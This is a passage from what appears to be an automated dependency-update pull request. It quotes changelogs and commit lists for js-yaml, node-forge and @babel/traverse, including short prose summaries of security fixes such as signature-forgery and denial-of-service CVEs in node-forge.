default.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.DEFAULT_SAFE_SCHEMA\u003c/code\u003e and \u003ccode\u003eyaml.DEFAULT_FULL_SCHEMA\u003c/code\u003e are removed, use\n\u003ccode\u003eyaml.DEFAULT_SCHEMA\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.Schema.create(schema, tags)\u003c/code\u003e is removed, use \u003ccode\u003eschema.extend(tags)\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e!!binary\u003c/code\u003e now always mapped to \u003ccode\u003eUint8Array\u003c/code\u003e on load.\u003c/li\u003e\n\u003cli\u003eReduced nesting of \u003ccode\u003e/lib\u003c/code\u003e folder.\u003c/li\u003e\n\u003cli\u003eParse numbers according to YAML 1.2 instead of YAML 1.1 (\u003ccode\u003e01234\u003c/code\u003e is now decimal,\n\u003ccode\u003e0o1234\u003c/code\u003e is octal, \u003ccode\u003e1:23\u003c/code\u003e is parsed as string instead of base60).\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e no longer quotes \u003ccode\u003e:\u003c/code\u003e, \u003ccode\u003e[\u003c/code\u003e, \u003ccode\u003e]\u003c/code\u003e, \u003ccode\u003e(\u003c/code\u003e, \u003ccode\u003e)\u003c/code\u003e except when necessary, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/470\"\u003e#470\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/557\"\u003e#557\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eLine and column in exceptions are now formatted as \u003ccode\u003e(X:Y)\u003c/code\u003e instead of\n\u003ccode\u003eat line X, column Y\u003c/code\u003e (also present in compact format), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/332\"\u003e#332\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCode snippet created in exceptions now contains multiple lines with line numbers.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e now serializes \u003ccode\u003eundefined\u003c/code\u003e as \u003ccode\u003enull\u003c/code\u003e in collections and removes keys with\n\u003ccode\u003eundefined\u003c/code\u003e in mappings, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/571\"\u003e#571\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e with \u003ccode\u003eskipInvalid=true\u003c/code\u003e now serializes invalid items in collections as null.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003e!\u003c/code\u003e are now dumped as \u003ccode\u003e!tag\u003c/code\u003e instead of \u003ccode\u003e!\u0026lt;!tag\u0026gt;\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/576\"\u003e#576\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003etag:yaml.org,2002:\u003c/code\u003e are now shorthanded using \u003ccode\u003e!!\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/258\"\u003e#258\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003e.mjs\u003c/code\u003e (es modules) support.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003equotingType\u003c/code\u003e and \u003ccode\u003eforceQuotes\u003c/code\u003e options for dumper to configure\nstring literal style, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/290\"\u003e#290\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/529\"\u003e#529\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003estyles: { '!!null': 'empty' }\u003c/code\u003e option for dumper\n(serializes \u003ccode\u003e{ foo: null }\u003c/code\u003e as \u0026quot;\u003ccode\u003efoo: \u003c/code\u003e\u0026quot;), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/570\"\u003e#570\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/9963d366dfbde0c69722452bcd40b41e7e4160a0\"\u003e\u003ccode\u003e9963d36\u003c/code\u003e\u003c/a\u003e 3.14.2 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/10d3c8e70a6888543f5cdb656bb39f73e0ea77c1\"\u003e\u003ccode\u003e10d3c8e\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/5278870a17454fe8621dbd8c445c412529525266\"\u003e\u003ccode\u003e5278870\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;) (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/731\"\u003e#731\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/3.14.1...3.14.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 4.1.0 to 4.1.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[3.14.2] - 2025-11-15\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackported v4.1.1 fix to v3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.0] - 2021-04-15\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eTypes are now exported as \u003ccode\u003eyaml.types.XXX\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEvery type now has \u003ccode\u003eoptions\u003c/code\u003e property with original arguments kept as they were\n(see \u003ccode\u003eyaml.types.int.options\u003c/code\u003e as an example).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eSchema.extend()\u003c/code\u003e now keeps old type order in case of conflicts\n(e.g. Schema.extend([ a, b, c ]).extend([ b, a, d ]) is now ordered as \u003ccode\u003eabcd\u003c/code\u003e instead of \u003ccode\u003ecbad\u003c/code\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.0.0] - 2021-01-03\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCheck \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/migrate_v3_to_v4.md\"\u003emigration guide\u003c/a\u003e to see details for all breaking changes.\u003c/li\u003e\n\u003cli\u003eBreaking: \u0026quot;unsafe\u0026quot; tags \u003ccode\u003e!!js/function\u003c/code\u003e, \u003ccode\u003e!!js/regexp\u003c/code\u003e, \u003ccode\u003e!!js/undefined\u003c/code\u003e are\nmoved to \u003ca href=\"https://github.com/nodeca/js-yaml-js-types\"\u003ejs-yaml-js-types\u003c/a\u003e package.\u003c/li\u003e\n\u003cli\u003eBreaking: removed \u003ccode\u003esafe*\u003c/code\u003e functions. Use \u003ccode\u003eload\u003c/code\u003e, \u003ccode\u003eloadAll\u003c/code\u003e, \u003ccode\u003edump\u003c/code\u003e\ninstead which are all now safe by default.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.DEFAULT_SAFE_SCHEMA\u003c/code\u003e and \u003ccode\u003eyaml.DEFAULT_FULL_SCHEMA\u003c/code\u003e are removed, use\n\u003ccode\u003eyaml.DEFAULT_SCHEMA\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.Schema.create(schema, tags)\u003c/code\u003e is removed, use \u003ccode\u003eschema.extend(tags)\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e!!binary\u003c/code\u003e now always mapped to \u003ccode\u003eUint8Array\u003c/code\u003e on load.\u003c/li\u003e\n\u003cli\u003eReduced nesting of \u003ccode\u003e/lib\u003c/code\u003e folder.\u003c/li\u003e\n\u003cli\u003eParse numbers according to YAML 1.2 instead of YAML 1.1 (\u003ccode\u003e01234\u003c/code\u003e is now decimal,\n\u003ccode\u003e0o1234\u003c/code\u003e is octal, \u003ccode\u003e1:23\u003c/code\u003e is parsed as string instead of base60).\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e no longer quotes \u003ccode\u003e:\u003c/code\u003e, \u003ccode\u003e[\u003c/code\u003e, \u003ccode\u003e]\u003c/code\u003e, \u003ccode\u003e(\u003c/code\u003e, \u003ccode\u003e)\u003c/code\u003e except when necessary, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/470\"\u003e#470\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/557\"\u003e#557\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eLine and column in exceptions are now formatted as \u003ccode\u003e(X:Y)\u003c/code\u003e instead of\n\u003ccode\u003eat line X, column Y\u003c/code\u003e (also present in compact format), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/332\"\u003e#332\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCode snippet created in exceptions now contains multiple lines with line numbers.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e now serializes \u003ccode\u003eundefined\u003c/code\u003e as \u003ccode\u003enull\u003c/code\u003e in collections and removes keys with\n\u003ccode\u003eundefined\u003c/code\u003e in mappings, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/571\"\u003e#571\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e with \u003ccode\u003eskipInvalid=true\u003c/code\u003e now serializes invalid items in collections as null.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003e!\u003c/code\u003e are now dumped as \u003ccode\u003e!tag\u003c/code\u003e instead of \u003ccode\u003e!\u0026lt;!tag\u0026gt;\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/576\"\u003e#576\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003etag:yaml.org,2002:\u003c/code\u003e are now shorthanded using \u003ccode\u003e!!\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/258\"\u003e#258\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003e.mjs\u003c/code\u003e (es modules) support.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003equotingType\u003c/code\u003e and \u003ccode\u003eforceQuotes\u003c/code\u003e options for dumper to configure\nstring literal style, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/290\"\u003e#290\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/529\"\u003e#529\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003estyles: { '!!null': 'empty' }\u003c/code\u003e option for dumper\n(serializes \u003ccode\u003e{ foo: null }\u003c/code\u003e as \u0026quot;\u003ccode\u003efoo: \u003c/code\u003e\u0026quot;), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/570\"\u003e#570\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/9963d366dfbde0c69722452bcd40b41e7e4160a0\"\u003e\u003ccode\u003e9963d36\u003c/code\u003e\u003c/a\u003e 3.14.2 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/10d3c8e70a6888543f5cdb656bb39f73e0ea77c1\"\u003e\u003ccode\u003e10d3c8e\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/5278870a17454fe8621dbd8c445c412529525266\"\u003e\u003ccode\u003e5278870\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;) (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/731\"\u003e#731\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/3.14.1...3.14.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `node-forge` from 1.3.0 to 1.4.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/digitalbazaar/forge/blob/main/CHANGELOG.md\"\u003enode-forge's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e1.4.0 - 2026-03-24\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eHIGH\u003c/strong\u003e: Denial of Service in \u003ccode\u003eBigInteger.modInverse()\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003eA Denial of Service (DoS) vulnerability exists due to an infinite loop in\nthe \u003ccode\u003eBigInteger.modInverse()\u003c/code\u003e function (inherited from the bundled jsbn\nlibrary). When \u003ccode\u003emodInverse()\u003c/code\u003e is called with a zero value as input, the\ninternal Extended Euclidean Algorithm enters an unreachable exit condition,\ncausing the process to hang indefinitely and consume 100% CPU.\u003c/li\u003e\n\u003cli\u003eReported by Kr0emer.\u003c/li\u003e\n\u003cli\u003eCVE ID: \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-33891\"\u003eCVE-2026-33891\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGHSA ID: \u003ca href=\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-5m6q-g25r-mvwx\"\u003eGHSA-5gfm-wpxj-wjgq\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHIGH\u003c/strong\u003e: Signature forgery in RSA-PKCS due to ASN.1 extra field.\n\u003cul\u003e\n\u003cli\u003eRSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low\npublic exponent keys (e=3). Attackers can forge signatures by stuffing\n\u0026quot;garbage\u0026quot; bytes within the ASN.1 structure in order to construct a\nsignature that passes verification, enabling Bleichenbacher style forgery.\nThis issue is similar to CVE-2022-24771, but adds bytes in an addition\nfield within the ASN.1 structure, rather than outside of it.\u003c/li\u003e\n\u003cli\u003eAdditionally, forge does not validate that signatures include a minimum of\n8 bytes of padding as defined by the specification, providing attackers\nadditional space to construct Bleichenbacher forgeries.\u003c/li\u003e\n\u003cli\u003eReported as part of a U.C. Berkeley security research project by:\n\u003cul\u003e\n\u003cli\u003eAustin Chu, Sohee Kim, and Corban Villa.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eCVE ID: \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-33894\"\u003eCVE-2026-33894\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGHSA ID: \u003ca href=\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp\"\u003eGHSA-ppp5-5v6c-4jwp\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHIGH\u003c/strong\u003e: Signature forgery in Ed25519 due to missing S \u0026lt; L check.\n\u003cul\u003e\n\u003cli\u003eEd25519 signature verification accepts forged non-canonical signatures\nwhere the scalar S is not reduced modulo the group order (S \u0026gt;= L). A valid\nsignature and its S + L variant both verify in forge, while Node.js\ncrypto.verify (OpenSSL-backed) rejects the S + L variant, as defined by the\nspecification. This class of signature malleability has been exploited in\npractice to bypass authentication and authorization logic (see\nCVE-2026-25793, CVE-2022-35961). Applications relying on signature\nuniqueness (i.e., dedup by signature bytes, replay tracking, signed-object\ncanonicalization checks) may be bypassed.\u003c/li\u003e\n\u003cli\u003eReported as part of a U.C. Berkeley security research project by:\n\u003cul\u003e\n\u003cli\u003eAustin Chu, Sohee Kim, and Corban Villa.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eCVE ID: \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-33895\"\u003eCVE-2026-33895\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGHSA ID: \u003ca href=\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-q67f-28xg-22rw\"\u003eGHSA-q67f-28xg-22rw\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHIGH\u003c/strong\u003e: \u003ccode\u003ebasicConstraints\u003c/code\u003e bypass in certificate chain verification.\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epki.verifyCertificateChain()\u003c/code\u003e does not enforce RFC 5280 \u003ccode\u003ebasicConstraints\u003c/code\u003e\nrequirements when an intermediate certificate lacks both the\n\u003ccode\u003ebasicConstraints\u003c/code\u003e and \u003ccode\u003ekeyUsage\u003c/code\u003e extensions. This allows any leaf\ncertificate (without these extensions) to act as a CA and sign other\ncertificates, which node-forge will accept as valid.\u003c/li\u003e\n\u003cli\u003eReported by Doruk Tan Ozturk (\u003ca href=\"https://github.com/peaktwilight\"\u003e\u003ccode\u003e@​peaktwilight\u003c/code\u003e\u003c/a\u003e) - doruk.ch\u003c/li\u003e\n\u003cli\u003eCVE ID: \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-33896\"\u003eCVE-2026-33896\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGHSA ID: \u003ca href=\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-2328-f5f3-gj25\"\u003eGHSA-2328-f5f3-gj25\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/fa385f92440879601240020f158bed68e444e83a\"\u003e\u003ccode\u003efa385f9\u003c/code\u003e\u003c/a\u003e Release 1.4.0.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/07d4e162762ed4fdab5caca9ebf78237fcf85339\"\u003e\u003ccode\u003e07d4e16\u003c/code\u003e\u003c/a\u003e Update changelog.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/cb90fd92091ee34e4abab3ad0c835eeea3d06c3e\"\u003e\u003ccode\u003ecb90fd9\u003c/code\u003e\u003c/a\u003e Update changelog.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/963e7c5c7b0f03de1b28a1e5a42a6bafda4cf711\"\u003e\u003ccode\u003e963e7c5\u003c/code\u003e\u003c/a\u003e Add unit test for \u0026quot;pseudonym\u0026quot;\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/f0b6f5b7c5d1c918240e975e0cade4f47d005446\"\u003e\u003ccode\u003ef0b6f5b\u003c/code\u003e\u003c/a\u003e Add pseudonym OID\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/3df48a311d4b53dc6493b7a47a8d07f3669957d9\"\u003e\u003ccode\u003e3df48a3\u003c/code\u003e\u003c/a\u003e Fix missing CVE ID.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/2e492832fb25227e6b647cbe1ac981c123171e90\"\u003e\u003ccode\u003e2e49283\u003c/code\u003e\u003c/a\u003e Add x509 \u003ccode\u003ebasicConstraints\u003c/code\u003e check.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/bdecf11571c9f1a487cc0fe72fe78ff6dfa96b85\"\u003e\u003ccode\u003ebdecf11\u003c/code\u003e\u003c/a\u003e Add canonical signature scaler check for S \u0026lt; L.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/af094e69c60ac5f7b29f2b1957c53ae5e12fd4a0\"\u003e\u003ccode\u003eaf094e6\u003c/code\u003e\u003c/a\u003e Add RSA padding and DigestInfo length checks.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/796eeb1673f6ec636fda02dfc295047d9f7aefe0\"\u003e\u003ccode\u003e796eeb1\u003c/code\u003e\u003c/a\u003e Improve jsbn fix.\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/digitalbazaar/forge/compare/v1.3.0...v1.4.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@babel/traverse` from 7.14.2 to 7.29.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e\u003ccode\u003e@​babel/traverse\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.0 (2026-01-31)\u003c/h2\u003e\n\u003cp\u003eThanks \u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e for your first PR!\u003c/p\u003e\n\u003ch4\u003e:rocket: New Feature\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-types\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17750\"\u003e#17750\u003c/a\u003e [7.x backport] Add attributes import declaration builder (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-standalone\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17663\"\u003e#17663\u003c/a\u003e [7.x backport] feat(standalone): export async transform (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17725\"\u003e#17725\u003c/a\u003e [7.x backport] feat: read standalone targets from data-targets (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17765\"\u003e#17765\u003c/a\u003e fix(parser): correctly parse type assertions in \u003ccode\u003eextends\u003c/code\u003e clause (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17723\"\u003e#17723\u003c/a\u003e [7.x backport] fix(parser): improve super type argument parsing (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-traverse\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17708\"\u003e#17708\u003c/a\u003e fix(traverse): provide a hub when traversing a File or Program and no parentPath is given (\u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-block-scoping\u003c/code\u003e, \u003ccode\u003ebabel-traverse\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17737\"\u003e#17737\u003c/a\u003e [7.x backport] fix: Rename switch discriminant references when body creates shadowing variable (\u003ca href=\"https://github.com/magic-akari\"\u003e\u003ccode\u003e@​magic-akari\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:running_woman: Performance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e, \u003ccode\u003ebabel-runtime-corejs3\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17642\"\u003e#17642\u003c/a\u003e [Babel 7] Improve generator performance (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 6\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eDavid (\u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNicolò Ribaudo (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/magic-akari\"\u003e\u003ccode\u003e@​magic-akari\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.28.6 (2026-01-12)\u003c/h2\u003e\n\u003cp\u003eThanks \u003ca href=\"https://github.com/kadhirash\"\u003e\u003ccode\u003e@​kadhirash\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/kolvian\"\u003e\u003ccode\u003e@​kolvian\u003c/code\u003e\u003c/a\u003e for your first PRs!\u003c/p\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-cli\u003c/code\u003e, \u003ccode\u003ebabel-code-frame\u003c/code\u003e, \u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-helper-check-duplicate-nodes\u003c/code\u003e, \u003ccode\u003ebabel-helper-fixtures\u003c/code\u003e, \u003ccode\u003ebabel-helper-plugin-utils\u003c/code\u003e, \u003ccode\u003ebabel-node\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-flow-comments\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-modules-commonjs\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-property-mutators\u003c/code\u003e, \u003ccode\u003ebabel-preset-env\u003c/code\u003e, \u003ccode\u003ebabel-traverse\u003c/code\u003e, \u003ccode\u003ebabel-types\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17589\"\u003e#17589\u003c/a\u003e Improve Unicode handling in code-frame tokenizer (\u003ca 